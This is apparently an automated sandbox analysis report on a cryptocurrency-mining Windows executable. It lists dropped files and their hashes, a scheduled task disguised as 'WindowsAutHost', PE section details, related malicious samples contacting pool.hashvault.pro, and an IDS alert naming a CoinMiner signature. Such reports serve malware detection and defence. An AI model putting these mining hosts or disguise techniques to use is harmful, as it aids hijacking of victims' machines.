                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                      • Execution Graph export aborted for target powershell.exe, PID 5712 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 6104 because it is empty
• Not all processes were analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
12:56:40 | API Interceptor | 133x Sleep call for process: powershell.exe modified
12:57:08 | Task Scheduler | Run new task: WindowsAutHost path: C:\Program Files\WindowsServices\WindowsAutHost
12:58:30 | API Interceptor | 1x Sleep call for process: conhost.exe modified
12:58:31 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
                      No context
Match | Associated Sample Name / URL | Detection | Context
pool.hashvault.pro | 1D9DD4AE9D1BA20DBF36549110C16150525122F3AA7FD.exe | malicious | 136.244.80.197
pool.hashvault.pro | ahraujX2G3.exe | malicious | 199.247.19.116
pool.hashvault.pro | NCVVe1Xqfs.exe | malicious | 199.247.19.116
pool.hashvault.pro | Qh2jNLL1bg.exe | malicious | 136.244.80.197
pool.hashvault.pro | sC9jiRdqYZ.exe | malicious | 199.247.19.116
pool.hashvault.pro | SecuriteInfo.com.Trojan.Generic.31723764.31681.24539.exe | malicious | 199.247.19.116
pool.hashvault.pro | RV1ohxohke.exe | malicious | 136.244.80.197
pool.hashvault.pro | SecuriteInfo.com.Trojan.DownLoader45.9818.8758.2030.exe | malicious | 199.247.19.116
pool.hashvault.pro | oX8y79yTcs.exe | malicious | 199.247.19.116
pool.hashvault.pro | GenshinHack v.7.2.exe | malicious | 131.153.56.98
pool.hashvault.pro | cxbqjWw79R.exe | malicious | 131.153.56.98
pool.hashvault.pro | KOSUJeOPJR.exe | malicious | 46.4.27.39
pool.hashvault.pro | KOSUJeOPJR.exe | malicious | 131.153.56.98
pool.hashvault.pro | h7pPvq39df.exe | malicious | 131.153.142.106
pool.hashvault.pro | mDindyhHiy.exe | malicious | 131.153.56.98
pool.hashvault.pro | ySBrm4hhNs.exe | malicious | 131.153.142.106
pool.hashvault.pro | XE1s8BC6iA.exe | malicious | 142.132.131.248
pool.hashvault.pro | XE1s8BC6iA.exe | malicious | 142.132.131.248
pool.hashvault.pro | Tt6TKqEQY9.exe | malicious | 142.132.131.248
pool.hashvault.pro | ZlubzN6S53.exe | malicious | 46.4.27.39
                      No context
                      No context
                      No context
                      Process:C:\Program Files\WindowsServices\WindowsAutHost
                      File Type:PE32+ executable (native) x86-64, for MS Windows
                      Category:dropped
                      Size (bytes):14544
                      Entropy (8bit):6.2660301556221185
                      Encrypted:false
                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                      MD5:0C0195C48B6B8582FA6F6373032118DA
                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 5%
                      • Antivirus: Metadefender, Detection: 0%, Browse
                      Process:C:\Users\user\Desktop\8iTXwpHCHb.exe
                      File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                      Category:dropped
                      Size (bytes):9861121
                      Entropy (8bit):7.96543135974881
                      Encrypted:false
                      SSDEEP:196608:lKhSUcGJi2WNOVCjJ81tMeO3PNa/fm9BPq+lIx2YBWO:KYWi2WqCjJMmc/b+lNk
                      MD5:5B8C8BDDB55534C3C0DDA7CB094EEC00
                      SHA1:462827378D1F9AEFE96F1A97ECDE09D9E76F86D4
                      SHA-256:124BF2342223005C220DDEC47863DD8A27BDBC933A3793FCB6B6ECCB202DAFC9
                      SHA-512:35C527544027860BCEA50B41F7E002262D8A837040DF68D050BBEC1E9326765BF73F1C19B0724A69A4C6F3B37A2BEA907079C695DDCB3C7F37D24625A599DD17
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):45177
                      Entropy (8bit):5.074672989013172
                      Encrypted:false
                      SSDEEP:768:ceW8JV3IpNBQkj22h4iUx/aVkfrRJv5FLv0znHoE8ard3uKPSOdB8N/zltAHkhNY:ceJJV3CNBQkj22h4iUx/aVkflJnLvAH/
                      MD5:FA0D737CAF174B5F1E345D9302DF942F
                      SHA1:270BF566DE3479E185B9B7880E5D8BD0D6796C52
                      SHA-256:507B7978B6A9D4C029ECD3D983BB21697D35703019870C19B7CB0A6C64913248
                      SHA-512:9EDFCBB2D9E75A95BBB3D0467DB520DE3FC1BB445A4BF46D84BA6ADA6B7E97D846293B7DB645601A9E7FD3330C6C0F3E85056B1A93C50B8166C8EE33721DF86B
                      Malicious:false
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1108
                      Entropy (8bit):5.276167954484878
                      Encrypted:false
                      SSDEEP:24:3DPpQrLAo4KAxX5qRPD42HZFe9t4CvKuKnKE4T:TPerB4nqRL/HZFe9t4Cv94zg
                      MD5:31AF022FC957818F9BBA7E437752B2AF
                      SHA1:C911377C86870A254A3803108594DD85C0BCB8C4
                      SHA-256:A4608855FE7FEBA2460978A9464769D9C21EC1D1CADC9FD1207D2D23289D58A7
                      SHA-512:F95F4E24ECEC05CD2B353F3D18D209CD94BDCAA30F7A96FAC5365310001C9A638DF131FE3128D0E1B345202186DBEB14A1A62FAF3EBE65B318A5C4FDAAE136CD
                      Malicious:false
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):45177
                      Entropy (8bit):5.074672989013172
                      Encrypted:false
                      SSDEEP:768:ceW8JV3IpNBQkj22h4iUx/aVkfrRJv5FLv0znHoE8ard3uKPSOdB8N/zltAHkhNY:ceJJV3CNBQkj22h4iUx/aVkflJnLvAH/
                      MD5:FA0D737CAF174B5F1E345D9302DF942F
                      SHA1:270BF566DE3479E185B9B7880E5D8BD0D6796C52
                      SHA-256:507B7978B6A9D4C029ECD3D983BB21697D35703019870C19B7CB0A6C64913248
                      SHA-512:9EDFCBB2D9E75A95BBB3D0467DB520DE3FC1BB445A4BF46D84BA6ADA6B7E97D846293B7DB645601A9E7FD3330C6C0F3E85056B1A93C50B8166C8EE33721DF86B
                      Malicious:false
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1296
                      Entropy (8bit):5.325148069001705
                      Encrypted:false
                      SSDEEP:24:3voPpQrLAo4KAxCoO515qRPD426ZnCvK39tCKnKJRSF8PwmgR:gPerB4BO1qRL/EnCvO9tC4aR48XgR
                      MD5:37DB7F22FC02B6EFAC0E8675934D3C2A
                      SHA1:2D32AF4F42701B2A36048E61B63FC60756C20EDB
                      SHA-256:3DF67EC75B01E9D0364DC2A20692F95CA7FC9E9E52733D54A971DA461356A613
                      SHA-512:36BF64FE98F0FB5DE150DB8873B1BBAD7FA4D75F21034C54AC017CAB69D687D38A2DBA9BC908861E351149CA8BA71C1CCE2D3205BE680A6A670D7CAD989EA86D
                      Malicious:false
                      Process:C:\Program Files\WindowsServices\WindowsAutHost
                      File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                      Category:dropped
                      Size (bytes):266240
                      Entropy (8bit):6.182593563213917
                      Encrypted:false
                      SSDEEP:6144:D7qMEtKgDp5foyLqqDIE3scZOfGna88WUM5eq0L:DrEIgXf7f1sGa8lN0L
                      MD5:94429096FE837680139AAFE94441EE5C
                      SHA1:376FB295532686CA49122AF5BE091BC32C66F29E
                      SHA-256:EEE4936DB8F467E8F9EAEFB2E351C6F1ADF3FEB6D428FD512D8C274852D2C2E8
                      SHA-512:CA51A2241D90F7379B0DB500850CA60EDCA59884ACBA1B50D850DDA7E1FE2623D71096B0BDB3D179643E4151582E595917760A8406395CEB4B22E3A3A3421036
                      Malicious:true
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:modified
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview:1
                      File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                      Entropy (8bit):7.965431525486837
                      TrID:
                      • Win64 Executable (generic) (12005/4) 74.95%
                      • Generic Win/DOS Executable (2004/3) 12.51%
                      • DOS Executable Generic (2002/1) 12.50%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                      File name:8iTXwpHCHb.exe
                      File size:9861120
                      MD5:e6001aac5a3ee379149fd36bb6fb0d6f
                      SHA1:071044b203de973c31e2504411cfa445b95402cf
                      SHA256:e244f4b3b1614865dcd266ca2e057a1d7aa2a09c87bc1feb823fb1ac858f4fa2
                      SHA512:f0f43f07b75aa5c705078e804a03ab786566bf4684211cfb88fd407c344b89dbdbac150768ed8a4a66c5e3d9f414572b7892cb0211ecfc7806fd31e376716d59
                      SSDEEP:196608:lKhSUcGJi2WNOVCjJ81tMeO3PNa/fm9BPq+lIx2YBWO:KYWi2WqCjJMmc/b+lNk
                      TLSH:3DA623FE219C2358C017CC649533ED09B2BA521E47F8999D7DDEBAC06FAF8189521F42
                      Icon Hash:00828e8e8686b000
                      Entrypoint:0x140c51bb6
                      Entrypoint Section:.u4~
                      Digitally signed:false
                      Imagebase:0x140000000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x6360CAA6 [Tue Nov 1 07:28:38 2022 UTC]
                      TLS Callbacks:0x40c4c18a, 0x1, 0x4000e800, 0x1, 0x4000e7d0, 0x1, 0x4000f350, 0x1, 0x40013890, 0x1
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:2
                      File Version Major:5
                      File Version Minor:2
                      Subsystem Version Major:5
                      Subsystem Version Minor:2
                      Import Hash:9cbeaf2511bbe838a31e03a5717a082b
                      Instruction
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2a5f8 | 0x8c | .u4~
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10bd000 | 0x4f2 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x10b5ec0 | 0x6120 | .u4~
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10bc000 | 0xdc | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | 
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x880a90 | 0x28 | .u4~
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | 
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x755000 | 0x90 | .7Z\
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x1000 | 0x31c08 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data | 0x33000 | 0x3b7d30 | 0x0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rdata | 0x3eb000 | 0x50f0 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .pdata | 0x3f1000 | 0x38f4 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .xdata | 0x3f5000 | 0x3120 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .bss | 0x3f9000 | 0xfa0 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x3fa000 | 0x1314 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .CRT | 0x3fc000 | 0x78 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .tls | 0x3fd000 | 0x10 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .HJN | 0x3fe000 | 0x3564e8 | 0x0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .7Z\ | 0x755000 | 0xae8 | 0xc00 | False | 0.02734375 | data | 0.14971851228902108 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .u4~ | 0x756000 | 0x965fe0 | 0x966000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .reloc | 0x10bc000 | 0xdc | 0x200 | False | 0.341796875 | data | 2.140624816061037 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                      .rsrc | 0x10bd000 | 0x4f2 | 0x600 | False | 0.3411458333333333 | data | 4.822785617605431 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Name | RVA | Size | Type | Language | Country
                      RT_MANIFEST | 0x10bd058 | 0x49a | XML 1.0 document, ASCII text | English | United States
                      DLL | Import
                      KERNEL32.dll | AddAtomA
                      msvcrt.dll | ___lc_codepage_func
                      SHELL32.dll | SHGetFolderPathW
                      KERNEL32.dll | GetVersion
                      USER32.dll | CharUpperBuffW
                      KERNEL32.dll | LocalAlloc, LocalFree, GetModuleFileNameW, ExitProcess, LoadLibraryA, GetModuleHandleA, GetProcAddress
                      Language of compilation system | Country where language is spoken | Map
                      English | United States | 
                      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                      11/02/22-12:58:39.104701 | TCP | 2831812 | ETPRO TROJAN CoinMiner Known Malicious Stratum Authline (2018-07-16 8) | 49695 | 80 | 192.168.2.4 | 199.247.19.116
